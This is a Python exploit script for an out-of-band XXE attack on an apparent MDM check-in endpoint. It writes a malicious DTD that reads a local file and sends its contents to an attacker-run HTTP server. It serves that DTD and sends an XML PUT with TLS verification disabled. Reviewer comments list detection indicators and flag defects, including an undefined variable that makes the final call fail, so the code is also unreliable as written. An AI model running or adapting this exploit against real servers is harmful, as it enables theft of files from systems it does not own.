#!/usr/bin/python3
import threading
import http.server
import socketserver
import requests
import urllib3
import argparse
from http.server import SimpleHTTPRequestHandler
# Silences the InsecureRequestWarning that urllib3 emits for each request made
# with verify=False (see perform_put). Certificate validation is disabled by
# that verify=False argument, not by this line; this only hides the warning.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
# Function to create a malicious DTD file
def create_malicious_dtd(filename, local_ip, local_port):
    """Write ``malicious.dtd`` into the current working directory.

    The file holds an out-of-band XXE parameter-entity chain that the XML
    body built in ``perform_put`` pulls in: one entity reads a local file
    and a second one sends that content to ``http://local_ip:local_port/``
    in a ``content=`` query string. From the defending side the artefact
    to look for is therefore an outbound HTTP GET from the application
    host carrying a ``content=`` parameter.

    Args:
        filename: accepted but not used anywhere in this function; the
            file path inside the entity is the literal string
            ``(unknown)`` in this listing.
        local_ip: host written into the exfiltration URL.
        local_port: port written into the exfiltration URL. ``main`` passes
            the raw argparse value, i.e. a string.
    """
    print(f"[*] Creating malicious DTD... {local_port}")
    raw_dtd = f"<!ENTITY % file SYSTEM \"file:///(unknown)\">" + "\n"
    raw_dtd += f"<!ENTITY % eval \"<!ENTITY % exfiltrate SYSTEM 'http://{local_ip}:{local_port}/?content=%file;'>\">" + "\n"
    raw_dtd += "%eval;" + "\n"
    raw_dtd += "%exfiltrate;" + "\n"
    # Relative path: the file lands in the working directory, which is also
    # the directory SimpleHTTPRequestHandler serves in start_python_server.
    with open("malicious.dtd", "w") as f:
        f.write(raw_dtd)
        f.close()  # redundant: the with-block already closes the file on exit
    print(f"[*] Malicious DTD created to read (unknown)")
# Function to start a Python server
def start_python_server(local_ip, local_port):
    """Serve the current working directory over plain HTTP on (local_ip, local_port).

    Calls ``serve_forever`` and therefore never returns on the success
    path; ``main`` runs it on a separate thread. Any exception raised while
    binding or serving is printed and ``exit(1)`` is called.

    Args:
        local_ip: interface address to bind.
        local_port: TCP port to bind (``main`` passes the integer 8000).
    """
    try:
        # SimpleHTTPRequestHandler serves files relative to the working
        # directory — the same place create_malicious_dtd writes its file.
        with socketserver.TCPServer((local_ip, local_port), SimpleHTTPRequestHandler) as httpd:
            print(f"Serving HTTP on {local_ip} port {local_port}...")
            httpd.serve_forever()
    except Exception as e:
        # Broad catch: a bind failure (port already in use, address not local
        # to this machine) ends up here as well. Because main runs this on a
        # worker thread, the SystemExit raised by exit() ends only that
        # thread; the process itself keeps running.
        print(f"Error: {e}")
        exit(1)
# Function to perform the HTTP PUT request
def perform_put(HOST, local_ip, local_port):
    """Send the XXE-bearing XML body to ``https://HOST/mdm/checkin`` and print the response.

    The DOCTYPE in the body references
    ``http://local_ip:local_port/malicious.dtd`` — the file written by
    ``create_malicious_dtd`` and served by ``start_python_server``. The
    request is made with ``verify=False``, so the target's TLS certificate
    is not validated. Response status and body are printed as-is.

    On the receiving side this request is recognisable as a PUT to
    ``/mdm/checkin`` whose body contains a DOCTYPE with an external
    parameter entity; that combination is a reasonable thing to alert on
    in access logs or at a WAF.

    Args:
        HOST: hostname or IP address of the target, used verbatim in the URL.
        local_ip: host part of the DTD URL embedded in the DOCTYPE.
        local_port: port part of the DTD URL embedded in the DOCTYPE.
    """
    print("[*] Sending payload to the target...")
    try:
        # "%c;" references an entity that neither this body nor the generated
        # DTD defines — TODO confirm whether that is intentional.
        xml = "<?xml version=\"1.0\" ?>\n" \
              "<!DOCTYPE a [\n" \
              f"<!ENTITY % asd SYSTEM \"http://{local_ip}:{local_port}/malicious.dtd\">\n" \
              "%asd;\n" \
              "%c;\n" \
              "]>\n" \
              "<a></a>"
        # Only KeyboardInterrupt is handled below; connection errors and
        # timeouts from requests propagate to the caller.
        r = requests.put(f"https://{HOST}/mdm/checkin", data=xml, verify=False)
        print(f"[*] Response Status: {r.status_code}")
        print(f"[*] Response Text: {r.text}")
    except KeyboardInterrupt:
        pass
        # NOTE(review): indentation was lost in this listing; whether exit(1)
        # belongs to this except branch (as reconstructed here) or sits after
        # the try at function level cannot be recovered — confirm against the
        # original file.
        exit(1)
def main():
    """Parse the CLI options, write the DTD, start the HTTP server thread, send the PUT.

    All four options are required: ``--target``, ``--filename``,
    ``--local-ip`` and ``--port``. ``--port`` is not converted with
    ``type=int`` and is passed on as a string. The HTTP server is started on
    the hard-coded port 8000 regardless of ``--port``; ``--port`` only
    appears in the exfiltration URL inside the DTD.

    NOTE(review): the final call passes ``local_port``, which is not bound
    anywhere in this function; as listed, that line raises NameError.
    The listing may be incomplete or mis-transcribed — confirm against the
    original file.
    """
    parser = argparse.ArgumentParser(description="A script to start a server and perform a PUT request.")
    parser.add_argument('--target', required=True, help='Hostname or IP address to target')
    parser.add_argument('--filename', required=True, help='Path to the file to be used')
    parser.add_argument('--local-ip', required=True, help='Local IP address to bind the server')
    parser.add_argument('--port', required=True, help='Port number for the listener')
    args = parser.parse_args()
    HOST = args.target
    filename = args.filename
    local_ip = args.local_ip
    port = args.port  # string: no type= on the argument
    local_http_port = 8000  # fixed port for the DTD-serving HTTP server
    create_malicious_dtd(filename, local_ip, port)
    # Execute the perform_put after starting the server
    # Non-daemon thread: the process stays alive as long as serve_forever runs.
    server_thread = threading.Thread(target=start_python_server, args=(local_ip, local_http_port))
    server_thread.start()
    perform_put(HOST, local_ip, local_port)
if __name__ == '__main__':
    main()  # script entry point when run directly